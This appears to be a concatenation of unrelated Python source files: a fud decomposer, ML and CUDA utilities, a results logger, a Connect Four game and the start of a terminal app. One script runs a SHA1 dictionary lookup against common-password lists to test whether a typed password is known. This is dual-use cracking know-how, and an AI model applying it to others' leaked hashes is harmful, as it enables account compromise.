        frg = ltrsort(uu,ffg,xx)
        xx1 = hrhrred(ltrmul(xx,frg),vv1)
        xxp = hrhx(xx1)
        xxrr1 = hrhrred(ltrmul(xxrr,frg),vv1)
        xxrrp = hrhx(xxrr1)
        t2 = timer()
        decomper_log.info("<<< repa perimeters %.3fs" % (t2-t1))
        return parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx1,xxp,xxrr1,xxrrp,f,g)
    def level(uu,aa,ttg,f,g):
        # Fold over the level tree: children first, then this node's
        # layerer on top of the children's fuds; g numbers level nodes.
        (uu0,ff0,g0) = (uu,fudEmpty(),g)
        for ((wmaxg,vvg,ffg),xxg) in ttg.items():
            (uuh,ffh,gh) = level(uu0,aa,xxg,f,g0)
            (uu1,gg,nn) = layerer(wmaxg,uuh,vvg,funion(ffg,ffh),aa,f,gh)
            (a,kk) = maxd(nn)
            gg1 = fudEmpty()
            if a > repaRounding:
                # Keep only the transforms the best derived set depends on.
                gg1 = depends(gg,kk)
            (uu0,ff0,g0) = (uu1,funion(ff0,gg1),gh+1)
        return (uu0,ff0,g0)
    def decomp(uu,zz,qq,f):
        # zz: decomposition tree so far; qq: per-node cache of (selected
        # history, reduced derived histogram); f: 1-based fud counter.
        if len(zz) == 0:
            # Root node: run the full level tree over the whole history.
            (uur,ffr,_) = level(uu,aa,zzg,f,1)
            if len(ffr) == 0:
                return (uu, decompFudEmpty())
            decomper_log.info(">>> slicing")
            stdout.flush()
            t3 = timer()
            decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffr)))
            aar = apply(uur,ffr,aa)
            wwr = sset(fder(ffr))
            aa1 = trim(reduce(uur,wwr,aar))
            decomper_log.info("derived cardinality : %d" % acard(red(aa1,wwr)))
            zzr = tsgl((stateEmpty(),ffr))
            qq[(stateEmpty(),ffr)] = (aar,aa1)
            # Drop large intermediates before recursing (memory).
            (ffr,nnr,kkr) = (None,None,None)
            t4 = timer()
            decomper_log.info("<<< slicing %.3fs" % (t4-t3))
            stdout.flush()
            return decomp(uur,zzr,qq,f+1)
        if fmax > 0 and f > fmax:
            # Fud budget exhausted.
            return (uu,zzdf(zztrim(zz)))
        decomper_log.info(">>> slice selection")
        stdout.flush()
        t1 = timer()
        # Collect unexpanded (size, (path, state, history)) candidates.
        mm = []
        for (nn,yy) in treesPlaces(zz):
            (rr,ff) = nn[-1]
            if len(ff) > 0:
                (bb,bb1) = qq[(rr,ff)]
                tt = dom(treesRoots(yy))
                for (ss,a) in aall(red(bb1,fder(ff))):
                    if a > 0 and ss not in tt:
                        mm.append((a,(nn,ss,bb)))
        decomper_log.info("slices: %d" % len(mm))
        if len(mm) == 0:
            t2 = timer()
            decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
            stdout.flush()
            return (uu,zzdf(zztrim(zz)))
        # Expand the largest slice next.
        mm.sort(key = lambda x: x[0])
        (a,(nn,ss,bb)) = mm[-1]
        cc = hrhrred(select(uu,ss,bb),vars(aa))
        decomper_log.info("decomp path length: %d" % len(nn))
        decomper_log.info("slice size: %d" % a)
        t2 = timer()
        decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
        stdout.flush()
        (uuc,ffc,_) = level(uu,cc,zzg,f,1)
        decomper_log.info(">>> slicing")
        stdout.flush()
        t3 = timer()
        decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffc)))
        wwc = sset(fder(ffc))
        ccc = apply(uuc,ffc,cc)
        cc1 = trim(reduce(uuc,wwc,ccc))
        decomper_log.info("derived cardinality : %d" % acard(red(cc1,wwc)))
        qq[(ss,ffc)] = (ccc,cc1)
        zzc = pathsTree(treesPaths(zz) + [nn+[(ss,ffc)]])
        # Drop large intermediates before recursing (memory).
        (mm,cc,ffc,nnc,kkc) = (None,None,None,None,None)
        t4 = timer()
        decomper_log.info("<<< slicing %.3fs" % (t4-t3))
        stdout.flush()
        return decomp(uuc,zzc,qq,f+1)
    # Parameter and substrate validation; None signals invalid input.
    if wmax < 0 or lmax < 0 or xmax < 0 or omax < 0 or bmax < 0 or mmax < 1 or umax < 0 or pmax < 0:
        return None
    if size(aa) == 0 or mult < 1:
        return None
    if not vars(aa).issubset(uvars(uu)):
        return None
    if not okLevel(zzg):
        return None
    decomper_log.info(">>> decomper")
    t1 = timer()
    x1 = decomp(uu,emptyTree(),sdict(),1)
    decomper_log.info("nodes: %d" % len(treesNodes(dfzz(x1[1]))))
    t2 = timer()
    decomper_log.info("<<< decomper repa %.3fs" % (t2 - t1))
    stdout.flush()
    return x1
# parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa_1 ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# Integer -> Integer ->
# System -> Tree (Integer, Set.Set Variable, Fud) -> HistoryRepa ->
# IO (Maybe (System, DecompFud))
def parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa_1(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,fmax,mult,seed,uu,zzg,aa):
    """Earlier (`_1`) variant of the level-tree fud decomper.

    Differs from the current version in that fder/fund/fvars come from the
    Alignment library rather than local reimplementations, and the layerer
    applies the level fud with `apply` instead of the sorted
    ltrsort/ltrmul/reduce pipeline.  Appears to be kept for reference —
    NOTE(review): confirm whether this variant is still called anywhere.

    Returns (system, DecompFud), or None for invalid parameters/substrate.
    """
    repaRounding = 1e-6
    # Short aliases for the Alignment library primitives used below.
    dom = relationsDomain
    def maxd(mm):
        # Maximum of [(vars, alignment)] as (alignment, vars).
        if len(mm) > 0:
            return list(sset([(b,a) for (a,b) in mm]))[-1]
        return (0,sset())
    def tsgl(r):
        # Singleton tree rooted at r.
        return sdict([(r,sdict())])
    uvars = systemsSetVar
    acard = histogramsCardinality
    trim = histogramsTrim
    aall = histogramsList
    def red(aa,vv):
        return setVarsHistogramsReduce(vv,aa)
    def unit(ss):
        return setStatesHistogramUnit(sset([ss]))
    qqff = setTransformsFud_u
    ffqq = fudsSetTransform
    fvars = fudsVars
    fder = fudsDerived
    fund = fudsUnderlying
    def funion(ff,gg):
        return qqff(ffqq(ff) | ffqq(gg))
    aahh = histogramsHistory
    hhhr = systemsHistoriesHistoryRepa
    def vars(hr):
        return sset(historyRepasVectorVar(hr))
    size = historyRepasSize
    rraa = systemsHistogramRepasHistogram
    hrhx = historyRepasRed
    def hrhrred(hr,vv):
        return setVarsHistoryRepasHistoryRepaReduced(vv,hr)
    def hrred(hr,vv):
        return setVarsHistoryRepasReduce(1,vv,hr)
    def reduce(uu,ww,hh):
        return rraa(uu,hrred(hh,ww))
    def select(uu,ss,hh):
        # Events of hh consistent with state ss.
        return historyRepasHistoryRepasHistoryRepaSelection_u(hhhr(uu,aahh(unit(ss))),hh)
    hrconcat = vectorHistoryRepasConcat_u
    hrshuffle = historyRepasShuffle_u
    ffqq = fudsSetTransform
    fder = fudsDerived
    tttr = systemsTransformsTransformRepa_u
    def apply(uu,ff,hh):
        return historyRepasListTransformRepasApply(hh,[tttr(uu,tt) for tt in ffqq(ff)])
    depends = fudsSetVarsDepends
    zzdf = treePairStateFudsDecompFud
    dfzz = decompFudsTreePairStateFud
    def zztrim(df):
        # Drop trailing empty-fud leaves from every path of the tree.
        pp = []
        for ll in treesPaths(df):
            (_,ff) = ll[-1]
            if len(ff) == 0:
                pp.append(ll[:-1])
            else:
                pp.append(ll)
        return pathsTree(pp)
    def okLevel(zzg):
        # Validate every level node against the substrate and the system.
        for (wmaxg,vvg,ffg) in treesElements(zzg):
            if wmaxg < 0:
                return False
            if not vvg.issubset(vars(aa)):
                return False
            if not fvars(ffg).issubset(uvars(uu)):
                return False
            if not fund(ffg).issubset(vars(aa)):
                return False
        return True
    def layerer(wmax,uu,vvg,ffg,xx,f,g):
        # wmax here is the level node's own wmax, shadowing the outer one.
        decomper_log.info(">>> repa shuffle")
        stdout.flush()
        t1 = timer()
        z = size(xx)
        xxrr = hrconcat([hrshuffle(xx,seed+i*z) for i in range(1,mult+1)])
        t2 = timer()
        decomper_log.info("<<< repa shuffle %.3fs" % (t2-t1))
        decomper_log.info(">>> repa perimeters")
        stdout.flush()
        t1 = timer()
        # Apply the level fud directly (no substrate restriction here,
        # unlike the current variant).
        xx1 = apply(uu,ffg,xx)
        xxp = hrhx(xx1)
        xxrr1 = apply(uu,ffg,xxrr)
        xxrrp = hrhx(xxrr1)
        t2 = timer()
        decomper_log.info("<<< repa perimeters %.3fs" % (t2-t1))
        return parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx1,xxp,xxrr1,xxrrp,f,g)
    def level(uu,aa,ttg,f,g):
        # Fold over the level tree: children first, then this node's
        # layerer on top of the children's fuds; g numbers level nodes.
        (uu0,ff0,g0) = (uu,fudEmpty(),g)
        for ((wmaxg,vvg,ffg),xxg) in ttg.items():
            (uuh,ffh,gh) = level(uu0,aa,xxg,f,g0)
            (uu1,gg,nn) = layerer(wmaxg,uuh,vvg,funion(ffg,ffh),aa,f,gh)
            (a,kk) = maxd(nn)
            gg1 = fudEmpty()
            if a > repaRounding:
                # Keep only the transforms the best derived set depends on.
                gg1 = depends(gg,kk)
            (uu0,ff0,g0) = (uu1,funion(ff0,gg1),gh+1)
        return (uu0,ff0,g0)
    def decomp(uu,zz,qq,f):
        # zz: decomposition tree so far; qq: per-node cache of (selected
        # history, reduced derived histogram); f: 1-based fud counter.
        if len(zz) == 0:
            # Root node: run the full level tree over the whole history.
            (uur,ffr,_) = level(uu,aa,zzg,f,1)
            if len(ffr) == 0:
                return (uu, decompFudEmpty())
            decomper_log.info(">>> slicing")
            stdout.flush()
            t3 = timer()
            decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffr)))
            aar = apply(uur,ffr,aa)
            wwr = fder(ffr)
            aa1 = trim(reduce(uur,wwr,aar))
            decomper_log.info("derived cardinality : %d" % acard(red(aa1,wwr)))
            zzr = tsgl((stateEmpty(),ffr))
            qq[(stateEmpty(),ffr)] = (aar,aa1)
            # Drop large intermediates before recursing (memory).
            (ffr,nnr,kkr) = (None,None,None)
            t4 = timer()
            decomper_log.info("<<< slicing %.3fs" % (t4-t3))
            stdout.flush()
            return decomp(uur,zzr,qq,f+1)
        if fmax > 0 and f > fmax:
            # Fud budget exhausted.
            return (uu,zzdf(zztrim(zz)))
        decomper_log.info(">>> slice selection")
        stdout.flush()
        t1 = timer()
        # Collect unexpanded (size, (path, state, history)) candidates.
        mm = []
        for (nn,yy) in treesPlaces(zz):
            (rr,ff) = nn[-1]
            if len(ff) > 0:
                (bb,bb1) = qq[(rr,ff)]
                tt = dom(treesRoots(yy))
                for (ss,a) in aall(red(bb1,fder(ff))):
                    if a > 0 and ss not in tt:
                        mm.append((a,(nn,ss,bb)))
        decomper_log.info("slices: %d" % len(mm))
        if len(mm) == 0:
            t2 = timer()
            decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
            stdout.flush()
            return (uu,zzdf(zztrim(zz)))
        # Expand the largest slice next.
        mm.sort(key = lambda x: x[0])
        (a,(nn,ss,bb)) = mm[-1]
        cc = hrhrred(select(uu,ss,bb),vars(aa))
        decomper_log.info("decomp path length: %d" % len(nn))
        decomper_log.info("slice size: %d" % a)
        t2 = timer()
        decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
        stdout.flush()
        (uuc,ffc,_) = level(uu,cc,zzg,f,1)
        decomper_log.info(">>> slicing")
        stdout.flush()
        t3 = timer()
        decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffc)))
        wwc = fder(ffc)
        ccc = apply(uuc,ffc,cc)
        cc1 = trim(reduce(uuc,wwc,ccc))
        decomper_log.info("derived cardinality : %d" % acard(red(cc1,wwc)))
        qq[(ss,ffc)] = (ccc,cc1)
        zzc = pathsTree(treesPaths(zz) + [nn+[(ss,ffc)]])
        # Drop large intermediates before recursing (memory).
        (mm,cc,ffc,nnc,kkc) = (None,None,None,None,None)
        t4 = timer()
        decomper_log.info("<<< slicing %.3fs" % (t4-t3))
        stdout.flush()
        return decomp(uuc,zzc,qq,f+1)
    # Parameter and substrate validation; None signals invalid input.
    if wmax < 0 or lmax < 0 or xmax < 0 or omax < 0 or bmax < 0 or mmax < 1 or umax < 0 or pmax < 0:
        return None
    if size(aa) == 0 or mult < 1:
        return None
    if not vars(aa).issubset(uvars(uu)):
        return None
    if not okLevel(zzg):
        return None
    decomper_log.info(">>> decomper")
    t1 = timer()
    x1 = decomp(uu,emptyTree(),sdict(),1)
    decomper_log.info("nodes: %d" % len(treesNodes(dfzz(x1[1]))))
    t2 = timer()
    decomper_log.info("<<< decomper repa %.3fs" % (t2 - t1))
    stdout.flush()
    return x1
| 43,415 | 17,385 |
import tensorflow as tf
import gc
def dump_tensors():
    """Release memory held by the global Keras/TensorFlow session state.

    Clears the Keras backend session (dropping the current graph, cached
    layers and models) and then forces a garbage-collection pass so that
    the now-unreferenced tensors are actually freed.

    Returns:
        int: the number of unreachable objects found by ``gc.collect()``,
        handy as a quick diagnostic.  Callers that ignored the previous
        implicit ``None`` return are unaffected.

    See:
        https://forums.fast.ai/t/gpu-memory-not-being-freed-after-training-is-over/10265/6
    """
    tf.keras.backend.clear_session()
    return gc.collect()
| 213 | 87 |
# -*- coding: utf-8 -*-
"""
dB 函数 CUDA
"""
import numpy as np
import pycuda.driver as drv
import pycuda.autoinit
from pycuda.compiler import SourceModule
from cctpy.baseutils import Vectors
mod = SourceModule("""
// cct_for_cuda.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include<stdio.h>
#include <math.h> // CUDA IGNORE
#define MM 0.001f
#define DIM 3
#define PI 3.1415927f
#define X 0
#define Y 1
#define Z 2
float sqrtf(float a) {
return (float)sqrt(a);
}
__device__ __forceinline__ void add3d(float* a, float* b, float* ret)
{
ret[X] = a[X] + b[X];
ret[Y] = a[Y] + b[Y];
ret[Z] = a[Z] + b[Z];
}
__device__ __forceinline__ void add3d_local(float* a_local, float* b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
__device__ __forceinline__ void sub3d(float* a, float* b, float* ret)
{
ret[X] = a[X] - b[X];
ret[Y] = a[Y] - b[Y];
ret[Z] = a[Z] - b[Z];
}
__device__ __forceinline__ void copy3d(float* src, float* des)
{
des[X] = src[X];
des[Y] = src[Y];
des[Z] = src[Z];
}
__device__ __forceinline__ void cross3d(float* a, float* b, float* ret)
{
ret[X] = a[Y] * b[Z] - a[Z] * b[Y];
ret[Y] = -a[X] * b[Z] + a[Z] * b[X];
ret[Z] = a[X] * b[Y] - a[Y] * b[X];
}
__device__ __forceinline__ void dot_a_v(float a, float* v)
{
v[X] *= a;
v[Y] *= a;
v[Z] *= a;
}
__device__ __forceinline__ float dot_v_v(float* v1, float* v2)
{
return v1[X] * v2[X] + v1[Y] * v2[Y] + v1[Z] * v2[Z];
}
__device__ __forceinline__ float len3d(float* v)
{
return sqrtf(v[X] * v[X] + v[Y] * v[Y] + v[Z] * v[Z]);
}
__device__ __forceinline__ void neg3d(float* v)
{
v[X] = -v[X];
v[Y] = -v[Y];
v[Z] = -v[Z];
}
// 注意,这里计算的不是电流元的磁场,还需要乘以 电流 和 μ0/4π (=1e-7)
__global__ void dB(float *p0, float *p1, float *p, float *ret)
{
float p01[DIM];
float r[DIM];
float rr;
sub3d(p1, p0, p01); // p01 = p1 - p0
add3d(p0, p1, r); // r = p0 + p1
dot_a_v(0.5,r); // r = (p0 + p1)/2
sub3d(p, r, r); // r = p - r
rr = len3d(r); // rr = len(r)
cross3d(p01, r, ret); // ret = p01 x r
rr = 1.0 / rr / rr / rr; // changed
dot_a_v(rr, ret); // rr . (p01 x r)
}
""")
# Look up the compiled __global__ kernel once at import time.
f = mod.get_function("dB")
# float *p0, float *p1, float *p, float *ret
def dB(p0: np.ndarray, p1: np.ndarray, p: np.ndarray, result: np.ndarray) -> None:
    """Biot–Savart field contribution of the segment (p0, p1) at point p.

    Launches the single-thread ``dB`` kernel: ``result`` receives
    (p1 - p0) x (p - midpoint) / |p - midpoint|^3, written in place.
    Per the kernel's own comment, the caller must still multiply by the
    current and by mu0/4pi (= 1e-7) to obtain the physical field.

    All four arguments are float32 arrays of length 3 — NOTE(review):
    dtype/shape are assumed from the kernel's float* signature; confirm
    at the call sites.
    """
    f(drv.In(p0), drv.In(p1), drv.In(p), drv.Out(result), block=(1, 1, 1), grid=(1, 1))
| 2,438 | 1,278 |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/00_model_based_keyword_generation.ipynb (unless otherwise specified).
__all__ = ['BartKeywordGenerator', 'ExtractiveKeywordGenerator', 'AbstractiveKeywordGenerator']
# Cell
from transformers import TextGenerationPipeline, TFAutoModelForPreTraining, TFBartForConditionalGeneration, BartTokenizer, pipeline
# Cell
class BartKeywordGenerator():
    """Keyword generator backed by a BART seq2seq model.

    The model is driven through the huggingface ``summarization`` pipeline;
    the generated "summary" is a ``;``-separated keyword string, which is
    split into a list per input document.
    """

    def __init__(self, model_name, use_cuda=False):
        self.model_name = model_name
        self.model = TFBartForConditionalGeneration.from_pretrained(self.model_name, from_pt=True)
        self.tokenizer = BartTokenizer.from_pretrained(self.model_name)
        self.use_cuda = use_cuda
        # pipeline() convention: device 0 = first GPU, -1 = CPU.
        if use_cuda:
            self.device = 0
        else:
            self.device = -1
        self.keyword_generator = pipeline("summarization", model=self.model, tokenizer=self.tokenizer, device=self.device)

    def generate(self, text, max_length=50, **kwargs):
        """Generate keywords for ``text`` (a string or list of strings).

        Returns a list of ``{"keywords": [...]}`` dicts, one per input.
        """
        outputs = self.keyword_generator(text, max_length=max_length, **kwargs)
        return [{"keywords": out['summary_text'].split(";")} for out in outputs]

    def batch_generate(self, texts, batch_size=8, max_length=50, **kwargs):
        """Generate keywords for ``texts``, feeding the pipeline in chunks
        of ``batch_size`` to bound memory use."""
        results = []
        for start in range(0, len(texts), batch_size):
            chunk = texts[start:start + batch_size]
            results.extend(self.generate(chunk, max_length=max_length, **kwargs))
        return results
# Cell
class ExtractiveKeywordGenerator(BartKeywordGenerator):
    """Extractive keyword generator: BART fine-tuned on the OpenKP dataset."""

    def __init__(self, use_cuda=False):
        super().__init__("ankur310794/bart-base-keyphrase-generation-openkp", use_cuda)
# Cell
class AbstractiveKeywordGenerator(BartKeywordGenerator):
    """Abstractive keyword generator: BART fine-tuned on the KPTimes dataset."""

    def __init__(self, use_cuda=False):
        super().__init__("ankur310794/bart-base-keyphrase-generation-kpTimes", use_cuda)
| 2,161 | 703 |
import pandas as pd
import matplotlib.pyplot as plt
import os
import time
# LaTeX preamble written at the top of results/Log.tex ("\\" in this source
# literal produces one backslash in the emitted file).
intro= """\
\\documentclass[a4paper]{article}
%% Language and font encodings
\\usepackage[english]{babel}
\\usepackage[utf8x]{inputenc}
\\usepackage[T1]{fontenc}
%% Sets page size and margins
\\usepackage[a4paper,top=3cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry}
%% Useful packages
\\usepackage{amsmath}
\\usepackage{graphicx}
\\usepackage[colorinlistoftodos]{todonotes}
\\usepackage[colorlinks=true, allcolors=blue]{hyperref}
\\title{Your Paper}
\\author{You}
\\begin{document}
\\maketitle
\\newpage
"""
banner= """\
___ _ ___ _ _
/ __|___ ___ _ _ __ _ ___ __ _ _ _ __| | | _ \__ _| |__| |___ ___
| (_ / -_) _ \ '_/ _` / -_) / _` | ' \/ _` | | _/ _` | '_ \ / _ (_-<
\___\___\___/_| \__, \___| \__,_|_||_\__,_| |_| \__,_|_.__/_\___/__/
|___/
___ _
/ __|___ __| |___
| (__/ _ \/ _` / -_)
\___\___/\__,_\___|
###################################################################################
"""
def writehdf5(dic, parameters, fig, fig1, fig2, localtime=""):
    """Persist one measurement run: save three plots as PNGs and the data plus
    run parameters into an HDF5 store named after the run timestamp.

    dic        -- column -> values mapping with the measured series
    parameters -- indexable sequence of run parameters (indices 0-6, 8, 9 used)
    fig/fig1/fig2 -- figure objects with a savefig() method (IV, conductance,
                     resistance plots)
    localtime  -- run name; defaults to the current asctime() timestamp

    Returns the run name actually used.
    """
    if localtime == "":
        localtime = str(time.asctime(time.localtime(time.time())))
    datafile = localtime.replace(" ", "")
    # os.makedirs replaces the former os.system("mkdir ...") shell call: no
    # shell involved, and it does not fail if the directory already exists.
    os.makedirs("results/Plots/" + datafile, exist_ok=True)
    fig.savefig("results/Plots/" + datafile + "/IV.png")
    fig1.savefig("results/Plots/" + datafile + "/Cond.png")
    fig2.savefig("results/Plots/" + datafile + "/Resistance.png")
    hdf = pd.HDFStore("results/data/{0}.h5".format(localtime))
    data = pd.DataFrame(data=dic)
    hdf.put(value=data, key='df', format='table', data_columns=True)
    # NOTE(review): parameters[7] is skipped and the 'Lengt_wire' spelling is
    # preserved (readers of existing stores depend on the key) — confirm both.
    parametersdic = {'Minimum_current': [parameters[0]],
                     'Maximum_current': [parameters[1]],
                     'Step_current': [parameters[2]],
                     'Amplitude_oscillation': [parameters[3]],
                     'Frequency_oscillation': [parameters[4]],
                     'Lengt_wire': [parameters[5]],
                     'Diameter_wire': [parameters[6]],
                     'Ac_Gain': [parameters[8]],
                     'Dc_gain': [parameters[9]]}
    dp = pd.DataFrame(data=parametersdic)
    hdf.put(value=dp, key='dp', format='table', data_columns=True)
    hdf.close()
    return localtime
def readhdf5():
    """Open results/data.h5 and return the dataframe whose key is read from stdin."""
    store = pd.HDFStore("results/data.h5")
    key = input("Name of the dataframe to load within the file:")
    return store['{0}'.format(key)]
def Latex():
    """Build results/Log.tex: one section per HDF5 file under results/data/.

    Each readable file contributes its three saved plots and the stored run
    parameters; unreadable/corrupt files get a placeholder section instead of
    aborting the whole report.
    """
    datafiles = os.listdir("results/data")
    with open('results/Log.tex', 'w') as log:
        log.write(intro)
        # Replaces os.system("mkdir ..."): no shell, no error if it exists.
        os.makedirs("results/Plots/", exist_ok=True)
        for datafile in datafiles:
            # One progress line per file (a duplicate debug print was removed).
            print(datafile)
            try:
                hdf = pd.HDFStore("results/data/" + datafile)
                # Strip the ".h5" suffix and spaces to match the plot dir name.
                datafile = datafile[:-3].replace(" ", "")
                parameters = hdf['dp']
                log.write("\\section{" + datafile + "}\n")
                os.system("clear")
                log.write("\\begin{figure}[h] \n\\centering \n")
                log.write("\\includegraphics[width=0.4\\textwidth]{Plots/" + datafile + "/IV.png}\n")
                log.write("\\includegraphics[width=0.4\\textwidth]{Plots/" + datafile + "/Cond.png}\n")
                log.write("\\includegraphics[width=0.4\\textwidth]{Plots/" + datafile + "/Resistance.png}\n")
                log.write("\\end{figure}\\\\\\\\\n\n")
                os.system("clear")
                log.write("All values are given in SI units\\\\ \n")
                for parameter in parameters.keys():
                    log.write(parameter + ": $" + str(parameters[parameter][0]) + "$\\\\ \n")
                log.write("File data stored in results/data/" + datafile + ".h5")
                os.system("clear")
                hdf.close()
            except Exception:
                # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
                # still propagate; any data/format error gets a placeholder.
                log.write("\\section{" + datafile + "}\n")
                log.write("Data corrupt or format not expected. File should be checked manually.")
            log.write("\\newpage\n")
            os.system("clear")
            print(banner)
            print("Generating Latex class:")
            print(datafile + "Added")
        log.write("\\end{document}")
        os.system("clear")
        print("All data has been saved")
    return
Latex()
| 5,344 | 1,778 |
from connect4_board import Board
from connect4_board import Player
import random
class Driver:
    """Console Connect-Four game runner for two human players."""
    def __init__(self):
        playerOne = input('Input Player 1 name: ')
        playerTwo = input('Input Player 2 name: ')
        self.p1 = Player(1, 'X', playerOne)
        self.p2 = Player(2, 'O', playerTwo)
        self.board = Board()
    def prompt(self, name):
        """Ask `name` for a column until a valid, non-full column (1-7) is given.

        Returns the 0-based column index.
        """
        while True:
            try:
                userInput = int(input(name + ' Insert Column (1-7): '))
            except ValueError:
                # Fixed message: the valid range is 1-7 (was "0-7").
                print('Please enter an integer from 1-7')
                continue
            if not (1 <= userInput <= 7):
                print('Please enter an integer from 1-7')
                continue
            if self.board.board[0][userInput - 1] != '.':
                # Top cell occupied -> the column is full.
                print('Column reached maximum. ', end='')
                continue
            return userInput - 1
    def decideStart(self):
        """Randomly pick who starts; returns (starter, second)."""
        # Player 1 starts on an even draw, player 2 on an odd one.
        if random.randint(0, 9) % 2 == 0:
            print(self.p1.getPlayerName(), 'Start!')
            return self.p1, self.p2
        print(self.p2.getPlayerName(), 'Start!')
        return self.p2, self.p1
    def printBoard(self):
        """Print the board followed by the column legend."""
        print(self.board, end='')
        print('-------------')
        print('1 2 3 4 5 6 7')
    def playerInsert(self, player):
        '''
        Prompt `player` for a move, drop the piece, and reprint the board.
        Returns True when the move wins the game.
        '''
        userinput = self.prompt(player.getPlayerName())
        row = self.board.findRow(userinput, player)
        player.addMoves(row, userinput)
        self.printBoard()
        if player.checkWin():
            print(player.getPlayerName(), 'Won')
            return True
        return False
    def tick(self):
        """Main game loop: alternate turns until a win or a full board."""
        starter, second = self.decideStart()
        self.printBoard()
        won = False
        while True:
            won = self.playerInsert(starter)
            if won or self.board.isFull():
                break
            won = self.playerInsert(second)
            if won or self.board.isFull():
                break
        # Fixed: previously "tied" was also printed when the winning move
        # happened to fill the board.
        if self.board.isFull() and not won:
            print('The game is tied!')
if __name__ == '__main__':
main = Driver()
main.tick() | 1,896 | 763 |
from urllib.request import urlopen, hashlib, time
# Une petite fonction pour un timer entre les 2 méthodes (locale et distante).
def sleeper(num):
    """Pause the program for `num` seconds, printing start/end timestamps.

    `num` may be anything float() accepts (int, float, numeric string).
    Raises ValueError for non-numeric input — the original looped forever in
    that case, because `continue` retried the exact same failed conversion.
    Returns False, as before.
    """
    delay = float(num)
    # Announce the pause and the resume with wall-clock timestamps.
    print('Programme en pause à: %s' % time.ctime())
    time.sleep(delay)
    print('Reprise du programme à: %s\n' % time.ctime())
    return False
# Password value to test
motdepass = input("Renseiger le mot de passe à tester.\n>")
# Hash it with SHA1 and keep the digest for comparison
hash_SHA1 = hashlib.sha1(bytes(motdepass, 'utf-8')).hexdigest()
#################################################
# Obtain a dictionary of common passwords       #
# Several methods are possible!!!               #
#################################################
# dictionnaire_crack_01 = open('1_mille_knows_password_1000.txt', mode = 'r', buffering = 1, newline = '\n', encoding = 'utf-8')
# dictionnaire_crack_02 = str(urlopen('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt').read(), 'utf-8')
########################################################################
# With the built-in "open" when the file is stored locally:            #
# "with" guarantees the file does not stay open.                      #
# This one only holds about 1 million words (~8 MB)...                #
########################################################################
with open('1_million_knows_password_1000000.txt', mode = 'r', buffering = 1, newline = '\n', encoding = 'utf-8') as dictionnaire_crack_01:
    # Loop until the end of the dictionary file
    for to_easy in dictionnaire_crack_01:
        # Loop again: one word per line...
        for cracked_pass in to_easy.split ():
            # Hash each candidate password from the dictionary
            hash_DICO_01 = hashlib.sha1(bytes(cracked_pass, 'utf-8')).hexdigest()
            # Compare the digests
            if hash_DICO_01 == hash_SHA1:
                # Match: show the password and stop searching
                print("Mot de passe connue: ", str(cracked_pass))
                print("The Hash password input is: ", str(hash_SHA1))
                print("The Hash password found is: ", str(hash_DICO_01))
                quit()
            # Otherwise keep searching with the next dictionary word
            elif hash_DICO_01 != hash_SHA1:
                print("Comparaison échouée! ", str(cracked_pass)," Test suivant...")
# The password is not in the local list.
print("Le mot de passe ", "[ ", str(motdepass), " ]", " n'est pas encore connue !!!")
# A short pause before the second method...
# Call "sleeper" with 10s, equivalent to time.sleep(10)
# NOTE(review): the comment in the original said "5 seconds" but the call sleeps 10.
sleeper(10)
############################################################################
# With the imported "urlopen" when the file is hosted on the net:          #
# Expect a wait proportional to the file size...                           #
# Loop over the dictionary passwords one by one (one per line)             #
############################################################################
# Fetch a small dictionary for the test:
dictionnaire_crack_02 = str(urlopen('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt').read(), 'utf-8')
for to_easy_02 in dictionnaire_crack_02.split('\n'):
    # Hash each candidate password from the dictionary
    hash_DICO_02 = hashlib.sha1(bytes(to_easy_02, 'utf-8')).hexdigest()
    # Compare the digests
    if hash_DICO_02 == hash_SHA1:
        # Match: show the password and stop searching
        print("Mot de passe connue: ", str(to_easy_02))
        print("The Hash password input is: ", str(hash_SHA1))
        print("The Hash password found is: ", str(hash_DICO_02))
        quit()
    # Otherwise keep searching with the next dictionary word
    elif hash_DICO_02 != hash_SHA1:
        print("Comparaison échouée! ", str(to_easy_02)," Test suivant...")
print("Le mot de passe ", "[ ", str(motdepass), " ]", " n'est pas encore connue !!!") | 4,450 | 1,421 |
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# Log to a file: stdout/stderr are taken over by the urwid curses UI.
fh = logging.FileHandler('otp.log')
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
import argparse
import urwid
import data_controller
import symbol_values
# Shaded fill drawn behind/around the main window.
_BACKGROUND = urwid.SolidFill(u'\N{MEDIUM SHADE}')
# Currency that all totals are converted into.
_BASE_CURRENCY = 'CHF'
_main_event_loop = urwid.AsyncioEventLoop()
# (name, foreground, background) display attributes; entries with a
# '<name>bold' sibling can be emphasised via _BOLD_MAP / boldify().
_PALETTE = [
    ('brand', 'bold,underline,dark blue', ''),
    ('underline', 'underline', ''),
    ('bold', 'bold', ''),
    ('err', 'dark red,bold', ''),
    ('reversed', 'standout', ''),
    ('up', 'dark green', ''),
    ('upbold', 'dark green,bold', ''),
    ('neutral', '', ''),
    ('neutralbold', 'bold', ''),
    ('down', 'dark red', ''),
